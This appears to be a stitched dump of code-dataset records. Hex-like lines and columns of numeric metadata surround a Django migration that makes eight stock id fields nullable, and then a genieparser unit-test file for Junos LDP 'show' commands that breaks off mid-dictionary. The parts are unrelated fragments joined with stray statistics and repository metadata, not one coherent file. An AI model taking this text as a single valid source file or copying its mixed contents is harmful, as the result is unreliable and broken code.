00 00010304
00 00010304
01 00010203
00 00010203
00 00010305
00 00010306
00 00010305
00 00010306
00 00010245
02 00010243
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
| 113.003012
| 256
| 0.982328
| 451
| 37,517
| 81.651885
| 0.210643
| 0.785553
| 1.157475
| 1.529396
| 0.881412
| 0.880272
| 0.880272
| 0.880272
| 0.880272
| 0.880272
| 0
| 0.985703
| 0.01562
| 37,517
| 331
| 257
| 113.344411
| 0.011427
| 0.001413
| 0
| 0.825
| 0
| 0
| 0.000587
| 0.000587
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0.00625
| 0.003125
| null | null | 0.00625
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 16
|
487f6ca51b72cfba149dbc11c7294a7ca6e60ddb
| 1,579
|
py
|
Python
|
stock/migrations/0004_auto_20210524_0215.py
|
ericpesto/Archeon-Django-REST-API
|
e02b871b95c5247d83580acfe25f6ec299fdb9b1
|
[
"MIT"
] | 1
|
2021-06-07T17:31:23.000Z
|
2021-06-07T17:31:23.000Z
|
stock/migrations/0004_auto_20210524_0215.py
|
ericpesto/Archeon-Django-REST-API
|
e02b871b95c5247d83580acfe25f6ec299fdb9b1
|
[
"MIT"
] | null | null | null |
stock/migrations/0004_auto_20210524_0215.py
|
ericpesto/Archeon-Django-REST-API
|
e02b871b95c5247d83580acfe25f6ec299fdb9b1
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.3 on 2021-05-24 02:15
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('stock', '0003_auto_20210522_1811'),
]
operations = [
migrations.AlterField(
model_name='stock',
name='artist_id',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='stock',
name='buyer_id',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='stock',
name='category_id',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='stock',
name='location_id',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='stock',
name='partner_id',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='stock',
name='source_id',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='stock',
name='sub_category_1_id',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='stock',
name='sub_category_2_id',
field=models.IntegerField(blank=True, null=True),
),
]
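Each AlterField above relaxes an existing integer column on the stock model so it may be blank/NULL. A minimal sketch of the model state these operations leave behind (a hypothetical reconstruction inferred only from the operations; the project's actual models.py is not part of this record, and the assumption is that 0004 changed nothing but null/blank):

# Hypothetical post-migration field definitions (illustrative only).
from django.db import models

class Stock(models.Model):
    # Every *_id column below is a plain nullable integer after this migration.
    artist_id = models.IntegerField(blank=True, null=True)
    buyer_id = models.IntegerField(blank=True, null=True)
    category_id = models.IntegerField(blank=True, null=True)
    location_id = models.IntegerField(blank=True, null=True)
    partner_id = models.IntegerField(blank=True, null=True)
    source_id = models.IntegerField(blank=True, null=True)
    sub_category_1_id = models.IntegerField(blank=True, null=True)
    sub_category_2_id = models.IntegerField(blank=True, null=True)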
| 29.240741
| 61
| 0.554148
| 153
| 1,579
| 5.568627
| 0.27451
| 0.187793
| 0.234742
| 0.2723
| 0.776995
| 0.776995
| 0.732394
| 0.732394
| 0.683099
| 0.683099
| 0
| 0.031103
| 0.328056
| 1,579
| 53
| 62
| 29.792453
| 0.771913
| 0.028499
| 0
| 0.680851
| 1
| 0
| 0.104439
| 0.015013
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.021277
| 0
| 0.085106
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6fa1ec753f3d3bc7506e0710280bd455555fdad1
| 62,115
|
py
|
Python
|
src/genie/libs/parser/junos/tests/test_show_ldp.py
|
Jmahaja1/genieparser
|
b5eff62db24bf70497eba3af5587d77cdbf25784
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/junos/tests/test_show_ldp.py
|
Jmahaja1/genieparser
|
b5eff62db24bf70497eba3af5587d77cdbf25784
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/junos/tests/test_show_ldp.py
|
Jmahaja1/genieparser
|
b5eff62db24bf70497eba3af5587d77cdbf25784
|
[
"Apache-2.0"
] | null | null | null |
# Python
import unittest
from unittest.mock import Mock
# ATS
from pyats.topology import Device
# Metaparser
from genie.metaparser.util.exceptions import SchemaEmptyParserError
from genie.libs.parser.junos.show_ldp import (ShowLDPSession,
                                              ShowLdpNeighbor,
                                              ShowLdpSessionIpaddressDetail,
                                              ShowLdpDatabaseSessionIpaddress,
                                              ShowLDPInterface,
                                              ShowLDPInterfaceDetail,
                                              ShowLDPOverview)
# =================================
# Unit test for 'show ldp session'
# =================================
class TestShowLDPSession(unittest.TestCase):
'''unit test for "show ldp session'''
device = Device(name='aDevice')
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_parsed_output = {
'ldp-session-information': {
'ldp-session': [{
'ldp-neighbor-address': '10.34.2.250',
'ldp-session-state': 'Operational',
'ldp-connection-state': 'Open',
'ldp-remaining-time': '26',
'ldp-session-adv-mode': 'DU'
}]
}
}
golden_output = {
'execute.return_value':
'''
Address State Connection Hold time Adv. Mode
10.34.2.250 Operational Open 26 DU
'''
}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowLDPSession(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowLDPSession(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output)
# ===============================================
# Unit test for 'show ldp interface {interface}'
# ===============================================
class TestShowLDPInterface(unittest.TestCase):
'''unit test for "show ldp interface {interface}'''
device = Device(name='aDevice')
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_parsed_output = {
"ldp-interface-information": {
"ldp-interface": {
"interface-name": "ge-0/0/0.0",
"ldp-interface-local-address": "10.169.14.157",
"ldp-label-space-id": "10.169.14.240:0",
"ldp-neighbor-count": "1",
"ldp-next-hello": "3"
}
}
}
golden_output = {
'execute.return_value':
'''
show ldp interface ge-0/0/0.0
Interface Address Label space ID Nbr Next
count hello
ge-0/0/0.0 10.169.14.157 10.169.14.240:0 1 3
'''
}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowLDPInterface(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse(interface='ge-0/0/0.0')
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowLDPInterface(device=self.device)
parsed_output = obj.parse(interface='ge-0/0/0.0')
self.assertEqual(parsed_output, self.golden_parsed_output)
# =====================================================
# Unit test for 'show ldp interface {interface} detail'
# =====================================================
class TestShowLDPInterfaceDetail(unittest.TestCase):
'''unit test for "show ldp interface {interface} detail'''
device = Device(name='aDevice')
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_parsed_output = {
"ldp-interface-information": {
"ldp-interface": {
"interface-name": "ge-0/0/0.0",
"ldp-interface-local-address": "10.169.14.157",
"ldp-label-space-id": "10.169.14.240:0",
"ldp-neighbor-count": "1",
"ldp-next-hello": "1",
"ldp-transport-address": "10.169.14.240",
"ldp-hello-interval": "5",
"ldp-holdtime": "15",
}
}
}
golden_output = {
'execute.return_value':
'''
show ldp interface ge-0/0/0.0 detail
Interface Address Label space ID Nbr Next
count hello
ge-0/0/0.0 10.169.14.157 10.169.14.240:0 1 1
Hello interval: 5, Hold time: 15, Transport address: 10.169.14.240
'''
}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowLDPInterfaceDetail(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse(interface='ge-0/0/0.0')
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowLDPInterfaceDetail(device=self.device)
parsed_output = obj.parse(interface='ge-0/0/0.0')
self.assertEqual(parsed_output, self.golden_parsed_output)
# =================================
# Unit test for 'show ldp neighbor'
# =================================
class TestShowLdpNeighbor(unittest.TestCase):
'''unit test for "show ldp neighbor '''
device = Device(name='aDevice')
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_parsed_output = {
'ldp-neighbor-information':
{'ldp-neighbor': [
{'interface-name': 'ge-0/0/0.0',
'ldp-label-space-id': '10.34.2.250:0',
'ldp-neighbor-address': '10.169.14.158',
'ldp-remaining-time': '14'
}
]
}
}
golden_output = {
'execute.return_value':
'''
show ldp neighbor
Address Interface Label space ID Hold time
10.169.14.158 ge-0/0/0.0 10.34.2.250:0 14
'''
}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowLdpNeighbor(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowLdpNeighbor(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output)
# ====================================================
# Unit test for 'show ldp database session ipaddress'
# ====================================================
class TestShowLdpDatabaseSessionIpaddress(unittest.TestCase):
'''unit test for "show ldp database session ipaddress'''
device = Device(name='aDevice')
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_parsed_output = {
"ldp-database-information": {
"ldp-database": [
{
"ldp-binding": [
{
"ldp-label": "3",
"ldp-prefix": "10.34.2.250/32"
},
{
"ldp-label": "16",
"ldp-prefix": "10.169.14.240/32"
}
],
"ldp-database-type": "Input label database",
"ldp-label-received": "2",
"ldp-session-id": "10.169.14.240:0--10.34.2.250:0"
},
{
"ldp-binding": [
{
"ldp-label": "16",
"ldp-prefix": "10.34.2.250/32"
},
{
"ldp-label": "3",
"ldp-prefix": "10.169.14.240/32"
}
],
"ldp-database-type": "Output label database",
"ldp-label-advertised": "2",
"ldp-session-id": "10.169.14.240:0--10.34.2.250:0"
}
]
}
}
golden_output = {
'execute.return_value':
'''
show ldp database 10.34.2.250
Input label database, 10.169.14.240:0--10.34.2.250:0
Labels received: 2
Label Prefix
3 10.34.2.250/32
16 10.169.14.240/32
Output label database, 10.169.14.240:0--10.34.2.250:0
Labels advertised: 2
Label Prefix
16 10.34.2.250/32
3 10.169.14.240/32
'''
}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowLdpDatabaseSessionIpaddress(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowLdpDatabaseSessionIpaddress(device=self.device)
parsed_output = obj.parse(ipaddress='10.34.2.250')
self.assertEqual(parsed_output, self.golden_parsed_output)
# ===============================================
# Unit test for 'show ldp interface {interface}'
# ===============================================
class TestShowLDPInterface2(unittest.TestCase):
    '''unit test for "show ldp interface {interface}" (second golden dataset)'''
device = Device(name='aDevice')
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_parsed_output = {
"ldp-interface-information": {
"ldp-interface": {
"interface-name": "ge-0/0/0.0",
"ldp-interface-local-address": "10.1.2.2",
"ldp-label-space-id": "10.204.14.100:0",
"ldp-neighbor-count": "1",
"ldp-next-hello": "3"
}
}
}
golden_output = {
'execute.return_value':
'''
show ldp interface ge-0/0/0.0
Interface Address Label space ID Nbr Next
count hello
ge-0/0/0.0 10.1.2.2 10.204.14.100:0 1 3
'''
}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowLDPInterface(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse(interface='ge-0/0/0.0')
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowLDPInterface(device=self.device)
parsed_output = obj.parse(interface='ge-0/0/0.0')
self.assertEqual(parsed_output, self.golden_parsed_output)
# =====================================================
# Unit test for 'show ldp interface {interface} detail'
# =====================================================
class TestShowLDPInterfaceDetail2(unittest.TestCase):
    '''unit test for "show ldp interface {interface} detail" (second golden dataset)'''
device = Device(name='aDevice')
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_parsed_output = {
"ldp-interface-information": {
"ldp-interface": {
"interface-name": "ge-0/0/0.0",
"ldp-interface-local-address": "10.1.2.2",
"ldp-label-space-id": "10.204.14.100:0",
"ldp-neighbor-count": "1",
"ldp-next-hello": "1",
"ldp-transport-address": "10.204.14.100",
"ldp-hello-interval": "5",
"ldp-holdtime": "15",
}
}
}
golden_output = {
'execute.return_value':
'''
show ldp interface ge-0/0/0.0 detail
Interface Address Label space ID Nbr Next
count hello
ge-0/0/0.0 10.1.2.2 10.204.14.100:0 1 1
Hello interval: 5, Hold time: 15, Transport address: 10.204.14.100
'''
}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowLDPInterfaceDetail(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse(interface='ge-0/0/0.0')
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowLDPInterfaceDetail(device=self.device)
parsed_output = obj.parse(interface='ge-0/0/0.0')
self.assertEqual(parsed_output, self.golden_parsed_output)
# =================================
# Unit test for 'show ldp overview'
# =================================
class TestShowLDPOverview(unittest.TestCase):
'''unit test for "show ldp overview'''
device = Device(name='aDevice')
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_output = {'execute.return_value': '''
show ldp overview
Instance: master
Reference count: 2
Router ID: 10.204.14.100
LDP inet: enabled
Transport preference: IPv4
Message id: 4
Configuration sequence: 1
Deaggregate: disabled
Explicit null: disabled
IPv6 tunneling: disabled
Strict targeted hellos: disabled
Loopback if added: no
Route preference: 9
Unicast transit LSP chaining: disabled
P2MP transit LSP chaining: disabled
Transit LSP statistics based on route statistics: disabled
LDP route acknowledgement: enabled
BGP export: enabled
LDP mtu discovery: disabled
LDP SR Mapping Client: disabled
Capabilities enabled: none
Egress FEC capabilities enabled: entropy-label-capability
Downstream unsolicited Sessions:
Operational: 1
Retention: liberal
Control: ordered
Auto targeted sessions:
Auto targeted: disabled
Dynamic tunnel session count: 0
P2MP:
Recursive route: disabled
No rsvp tunneling: disabled
Timers:
Keepalive interval: 10, Keepalive timeout: 30
Link hello interval: 5, Link hello hold time: 15
Targeted hello interval: 15, Targeted hello hold time: 45
Label withdraw delay: 60, Make before break timeout: 30
Make before break switchover delay: 3
Link protection timeout: 120
Graceful restart:
Restart: disabled, Helper: enabled, Restart in process: false
Reconnect time: 60000, Max neighbor reconnect time: 120000
Recovery time: 160000, Max neighbor recovery time: 240000
Traffic Engineering:
Bgp igp: disabled
Both ribs: disabled
Mpls forwarding: disabled
IGP:
Tracking igp metric: disabled
Sync session up delay: 10
Session protection:
Session protection: disabled
Session protection timeout: 0
Interface addresses advertising:
10.1.2.2
LDP Job:
Read job time quantum: 1000, Write job time quantum: 1000
Read job loop quantum: 100, Write job loop quantum: 100
Backup inbound read job time quantum: 1000, Backup outbound read job time quantum: 1000
Backup inbound read job loop quantum: 100, Backup outbound read job loop quantum: 100
Label allocation:
Current number of LDP labels allocated: 1
Total number of LDP labels allocated: 1
Total number of LDP labels freed: 0
Total number of LDP label allocation failure: 0
Current number of labels allocated by all protocols: 0
'''}
golden_parsed_output = {
'ldp-overview-information': {
'ldp-overview': {
'ldp-auto-targeted-session': {
'ldp-auto-targeted-dyn-tun-ses-count': 0,
'ldp-auto-targeted-session-enabled': 'disabled'
},
'ldp-bgp-export': 'enabled',
'ldp-configuration-sequence': 1,
'ldp-deaggregate': 'disabled',
'ldp-explicit-null': 'disabled',
'ldp-gr-overview': {
'ldp-gr-helper': 'enabled',
'ldp-gr-max-neighbor-reconnect-time': 120000,
'ldp-gr-max-neighbor-recovery-time': 240000,
'ldp-gr-reconnect-time': 60000,
'ldp-gr-recovery-time': 160000,
'ldp-gr-restart': 'disabled',
'ldp-gr-restarting': 'false'
},
'ldp-igp-overview': {
'ldp-igp-sync-session-up-delay': 10,
'ldp-tracking-igp-metric': 'disabled'
},
'ldp-inet': 'enabled',
'ldp-instance-capability': {
'ldp-capability': 'none'
},
'ldp-instance-egress-fec-capability': {
'ldp-egress-fec-capability': 'entropy-label-capability'
},
'ldp-instance-name': 'master',
'ldp-interface-address': {
'interface-address': '10.1.2.2'
},
'ldp-ipv6-tunneling': 'disabled',
'ldp-job-overview': {
'ldp-inbound-read-job-loop-quantum': 100,
'ldp-inbound-read-job-time-quantum': 1000,
'ldp-outbound-read-job-loop-quantum': 100,
'ldp-outbound-read-job-time-quantum': 1000,
'ldp-read-job-loop-quantum': 100,
'ldp-read-job-time-quantum': 1000,
'ldp-write-job-loop-quantum': 100,
'ldp-write-job-time-quantum': 1000
},
'ldp-label-allocation': {
'ldp-global-label-current-allocs': 0,
'ldp-label-alloc-failure': 0,
'ldp-label-current-allocs': 1,
'ldp-label-total-allocs': 1,
'ldp-label-total-frees': 0
},
'ldp-loopback-if-added': 'no',
'ldp-message-id': 4,
'ldp-mtu-discovery': 'disabled',
'ldp-p2mp': {
'ldp-p2mp-no-rsvp-tunneling-enabled': 'disabled',
'ldp-p2mp-recursive-route-enabled': 'disabled'
},
'ldp-p2mp-transit-lsp-chaining': 'disabled',
'ldp-reference-count': 2,
'ldp-route-acknowledgement': 'enabled',
'ldp-route-preference': 9,
'ldp-router-id': '10.204.14.100',
'ldp-session-count': {
'ldp-control-mode': 'ordered',
'ldp-retention-mode': 'liberal',
'ldp-session-operational': 1
},
'ldp-session-protect-overview': {
'ldp-session-protect': 'disabled',
'ldp-session-protect-timeout': 0
},
'ldp-sr-mapping-client': 'disabled',
'ldp-strict-targeted-hellos': 'disabled',
'ldp-te-overview': {
'ldp-te-bgp-igp': 'disabled',
'ldp-te-both-ribs': 'disabled',
'ldp-te-mpls-forwarding': 'disabled'
},
'ldp-timer-overview': {
'ldp-instance-keepalive-interval': 10,
'ldp-instance-keepalive-timeout': 30,
'ldp-instance-label-withdraw-delay': 60,
'ldp-instance-link-hello-hold-time': 15,
'ldp-instance-link-hello-interval': 5,
'ldp-instance-link-protection-timeout': 120,
'ldp-instance-make-before-break-switchover-delay': 3,
'ldp-instance-make-before-break-timeout': 30,
'ldp-instance-targeted-hello-hold-time': 45,
'ldp-instance-targeted-hello-interval': 15
},
'ldp-transit-lsp-route-stats': 'disabled',
'ldp-transport-preference': 'IPv4',
'ldp-unicast-transit-lsp-chaining': 'disabled'
}
}
}
golden_output_2 = {'execute.return_value': '''
show ldp overview
Instance: master
Router ID: 10.204.14.100
Message id: 345
Configuration sequence: 1
Deaggregate: disabled
Explicit null: disabled
IPv6 tunneling: disabled
Strict targeted hellos: disabled
Loopback if added: no
Route preference: 9
Unicast transit LSP chaining: disabled
P2MP transit LSP chaining: disabled
Transit LSP statistics based on route statistics: disabled
Capabilities enabled: none
Protocol modes:
Distribution: unsolicited
Retention: liberal
Control: ordered
Sessions:
Operational: 1
Timers:
Keepalive interval: 10, Keepalive timeout: 30
Link hello interval: 5, Link hello hold time: 15
Targeted hello interval: 15, Targeted hello hold time: 45
Label withdraw delay: 60
Graceful restart:
Restart: enabled, Helper: enabled, Restart in process: false
Reconnect time: 60000, Max neighbor reconnect time: 120000
Recovery time: 160000, Max neighbor recovery time: 240000
Traffic Engineering:
Bgp igp: disabled
Both ribs: disabled
Mpls forwarding: disabled
IGP:
Tracking igp metric: disabled
Sync session up delay: 10
Session protection:
Session protection: disabled
Session protecton timeout: 0
Interface addresses advertising:
10.1.2.2
'''}
golden_parsed_output_2 = {
'ldp-overview-information': {
'ldp-overview': {
'ldp-configuration-sequence': 1,
'ldp-deaggregate': 'disabled',
'ldp-explicit-null': 'disabled',
'ldp-gr-overview': {
'ldp-gr-helper': 'enabled',
'ldp-gr-max-neighbor-reconnect-time': 120000,
'ldp-gr-max-neighbor-recovery-time': 240000,
'ldp-gr-reconnect-time': 60000,
'ldp-gr-recovery-time': 160000,
'ldp-gr-restart': 'enabled',
'ldp-gr-restarting': 'false'
},
'ldp-igp-overview': {
'ldp-igp-sync-session-up-delay': 10,
'ldp-tracking-igp-metric': 'disabled'
},
'ldp-instance-capability': {
'ldp-capability': 'none'
},
'ldp-instance-name': 'master',
'ldp-interface-address': {
'interface-address': '10.1.2.2'
},
'ldp-ipv6-tunneling': 'disabled',
'ldp-loopback-if-added': 'no',
'ldp-message-id': 345,
'ldp-p2mp-transit-lsp-chaining': 'disabled',
'ldp-protocol-modes': {
'ldp-control-mode': 'ordered',
'ldp-distribution-mode': 'unsolicited',
'ldp-retention-mode': 'liberal'
},
'ldp-route-preference': 9,
'ldp-router-id': '10.204.14.100',
'ldp-session-count': {
'ldp-session-operational': 1
},
'ldp-session-protect-overview': {
'ldp-session-protect': 'disabled',
'ldp-session-protect-timeout': 0
},
'ldp-strict-targeted-hellos': 'disabled',
'ldp-te-overview': {
'ldp-te-bgp-igp': 'disabled',
'ldp-te-both-ribs': 'disabled',
'ldp-te-mpls-forwarding': 'disabled'
},
'ldp-timer-overview': {
'ldp-instance-keepalive-interval': 10,
'ldp-instance-keepalive-timeout': 30,
'ldp-instance-label-withdraw-delay': 60,
'ldp-instance-link-hello-hold-time': 15,
'ldp-instance-link-hello-interval': 5,
'ldp-instance-targeted-hello-hold-time': 45,
'ldp-instance-targeted-hello-interval': 15
},
'ldp-transit-lsp-route-stats': 'disabled',
'ldp-unicast-transit-lsp-chaining': 'disabled'
}
}
}
golden_output_3 = {'execute.return_value': '''
show ldp overview
Instance: master
Reference count: 2
Router ID: 10.204.14.100
LDP inet: enabled
Transport preference: IPv4
Message id: 4
Configuration sequence: 1
Deaggregate: disabled
Explicit null: disabled
IPv6 tunneling: disabled
Strict targeted hellos: disabled
Loopback if added: no
Route preference: 9
Unicast transit LSP chaining: disabled
P2MP transit LSP chaining: disabled
Transit LSP statistics based on route statistics: disabled
LDP route acknowledgement: enabled
BGP export: enabled
LDP mtu discovery: disabled
LDP SR Mapping Client: disabled
Capabilities enabled: none
Egress FEC capabilities enabled: entropy-label-capability
Downstream unsolicited Sessions:
Operational: 1
Retention: liberal
Control: ordered
Auto targeted sessions:
Auto targeted: disabled
Dynamic tunnel session count: 0
P2MP:
Recursive route: disabled
No rsvp tunneling: disabled
Timers:
Keepalive interval: 10, Keepalive timeout: 30
Link hello interval: 5, Link hello hold time: 15
Targeted hello interval: 15, Targeted hello hold time: 45
Label withdraw delay: 60, Make before break timeout: 30
Make before break switchover delay: 3
Link protection timeout: 120
Graceful restart:
Restart: disabled, Helper: enabled, Restart in process: false
Reconnect time: 60000, Max neighbor reconnect time: 120000
Recovery time: 160000, Max neighbor recovery time: 240000
Traffic Engineering:
Bgp igp: disabled
Both ribs: disabled
Mpls forwarding: disabled
IGP:
Tracking igp metric: disabled
Sync session up delay: 10
Session protection:
Session protection: disabled
Session protection timeout: 0
Interface addresses advertising:
10.1.2.2
LDP Job:
Read job time quantum: 1000, Write job time quantum: 1000
Read job loop quantum: 100, Write job loop quantum: 100
Backup inbound read job time quantum: 1000, Backup outbound read job time quantum: 1000
Backup inbound read job loop quantum: 100, Backup outbound read job loop quantum: 100
Label allocation:
Current number of LDP labels allocated: 1
Total number of LDP labels allocated: 1
Total number of LDP labels freed: 0
Total number of LDP label allocation failure: 0
Current number of labels allocated by all protocols: 0
'''}
golden_parsed_output_3 = {
'ldp-overview-information': {
'ldp-overview': {
'ldp-auto-targeted-session': {
'ldp-auto-targeted-dyn-tun-ses-count': 0,
'ldp-auto-targeted-session-enabled': 'disabled'
},
'ldp-bgp-export': 'enabled',
'ldp-configuration-sequence': 1,
'ldp-deaggregate': 'disabled',
'ldp-explicit-null': 'disabled',
'ldp-gr-overview': {
'ldp-gr-helper': 'enabled',
'ldp-gr-max-neighbor-reconnect-time': 120000,
'ldp-gr-max-neighbor-recovery-time': 240000,
'ldp-gr-reconnect-time': 60000,
'ldp-gr-recovery-time': 160000,
'ldp-gr-restart': 'disabled',
'ldp-gr-restarting': 'false'
},
'ldp-igp-overview': {
'ldp-igp-sync-session-up-delay': 10,
'ldp-tracking-igp-metric': 'disabled'
},
'ldp-inet': 'enabled',
'ldp-instance-capability': {
'ldp-capability': 'none'
},
'ldp-instance-egress-fec-capability': {
'ldp-egress-fec-capability': 'entropy-label-capability'
},
'ldp-instance-name': 'master',
'ldp-interface-address': {
'interface-address': '10.1.2.2'
},
'ldp-ipv6-tunneling': 'disabled',
'ldp-job-overview': {
'ldp-inbound-read-job-loop-quantum': 100,
'ldp-inbound-read-job-time-quantum': 1000,
'ldp-outbound-read-job-loop-quantum': 100,
'ldp-outbound-read-job-time-quantum': 1000,
'ldp-read-job-loop-quantum': 100,
'ldp-read-job-time-quantum': 1000,
'ldp-write-job-loop-quantum': 100,
'ldp-write-job-time-quantum': 1000
},
'ldp-label-allocation': {
'ldp-global-label-current-allocs': 0,
'ldp-label-alloc-failure': 0,
'ldp-label-current-allocs': 1,
'ldp-label-total-allocs': 1,
'ldp-label-total-frees': 0
},
'ldp-loopback-if-added': 'no',
'ldp-message-id': 4,
'ldp-mtu-discovery': 'disabled',
'ldp-p2mp': {
'ldp-p2mp-no-rsvp-tunneling-enabled': 'disabled',
'ldp-p2mp-recursive-route-enabled': 'disabled'
},
'ldp-p2mp-transit-lsp-chaining': 'disabled',
'ldp-reference-count': 2,
'ldp-route-acknowledgement': 'enabled',
'ldp-route-preference': 9,
'ldp-router-id': '10.204.14.100',
'ldp-session-count': {
'ldp-control-mode': 'ordered',
'ldp-retention-mode': 'liberal',
'ldp-session-operational': 1
},
'ldp-session-protect-overview': {
'ldp-session-protect': 'disabled',
'ldp-session-protect-timeout': 0
},
'ldp-sr-mapping-client': 'disabled',
'ldp-strict-targeted-hellos': 'disabled',
'ldp-te-overview': {
'ldp-te-bgp-igp': 'disabled',
'ldp-te-both-ribs': 'disabled',
'ldp-te-mpls-forwarding': 'disabled'
},
'ldp-timer-overview': {
'ldp-instance-keepalive-interval': 10,
'ldp-instance-keepalive-timeout': 30,
'ldp-instance-label-withdraw-delay': 60,
'ldp-instance-link-hello-hold-time': 15,
'ldp-instance-link-hello-interval': 5,
'ldp-instance-link-protection-timeout': 120,
'ldp-instance-make-before-break-switchover-delay': 3,
'ldp-instance-make-before-break-timeout': 30,
'ldp-instance-targeted-hello-hold-time': 45,
'ldp-instance-targeted-hello-interval': 15
},
'ldp-transit-lsp-route-stats': 'disabled',
'ldp-transport-preference': 'IPv4',
'ldp-unicast-transit-lsp-chaining': 'disabled'
}
}
}
golden_output_4 = {'execute.return_value': '''
show ldp overview
Instance: master
Reference count: 2
Router ID: 10.204.14.100
LDP inet: enabled
Transport preference: IPv4
Message id: 4
Configuration sequence: 1
Deaggregate: disabled
Explicit null: disabled
IPv6 tunneling: disabled
Strict targeted hellos: disabled
Loopback if added: no
Route preference: 9
Unicast transit LSP chaining: disabled
P2MP transit LSP chaining: disabled
Transit LSP statistics based on route statistics: disabled
LDP route acknowledgement: enabled
BGP export: enabled
LDP mtu discovery: disabled
LDP SR Mapping Client: disabled
Capabilities enabled: none
Egress FEC capabilities enabled: entropy-label-capability
Downstream unsolicited Sessions:
Nonexistent: 1
Retention: liberal
Control: ordered
Auto targeted sessions:
Auto targeted: disabled
Dynamic tunnel session count: 0
P2MP:
Recursive route: disabled
No rsvp tunneling: disabled
Timers:
Keepalive interval: 10, Keepalive timeout: 30
Link hello interval: 5, Link hello hold time: 15
Targeted hello interval: 15, Targeted hello hold time: 45
Label withdraw delay: 60, Make before break timeout: 30
Make before break switchover delay: 3
Link protection timeout: 120
Graceful restart:
Restart: disabled, Helper: enabled, Restart in process: false
Reconnect time: 60000, Max neighbor reconnect time: 120000
Recovery time: 160000, Max neighbor recovery time: 240000
Traffic Engineering:
Bgp igp: disabled
Both ribs: disabled
Mpls forwarding: disabled
IGP:
Tracking igp metric: disabled
Sync session up delay: 10
Session protection:
Session protection: disabled
Session protection timeout: 0
Interface addresses advertising:
10.1.2.2
LDP Job:
Read job time quantum: 1000, Write job time quantum: 1000
Read job loop quantum: 100, Write job loop quantum: 100
Backup inbound read job time quantum: 1000, Backup outbound read job time quantum: 1000
Backup inbound read job loop quantum: 100, Backup outbound read job loop quantum: 100
Label allocation:
Current number of LDP labels allocated: 0
Total number of LDP labels allocated: 0
Total number of LDP labels freed: 0
Total number of LDP label allocation failure: 0
Current number of labels allocated by all protocols: 0
'''}
golden_parsed_output_4 = {
'ldp-overview-information': {
'ldp-overview': {
'ldp-auto-targeted-session': {
'ldp-auto-targeted-dyn-tun-ses-count': 0,
'ldp-auto-targeted-session-enabled': 'disabled'
},
'ldp-bgp-export': 'enabled',
'ldp-configuration-sequence': 1,
'ldp-deaggregate': 'disabled',
'ldp-explicit-null': 'disabled',
'ldp-gr-overview': {
'ldp-gr-helper': 'enabled',
'ldp-gr-max-neighbor-reconnect-time': 120000,
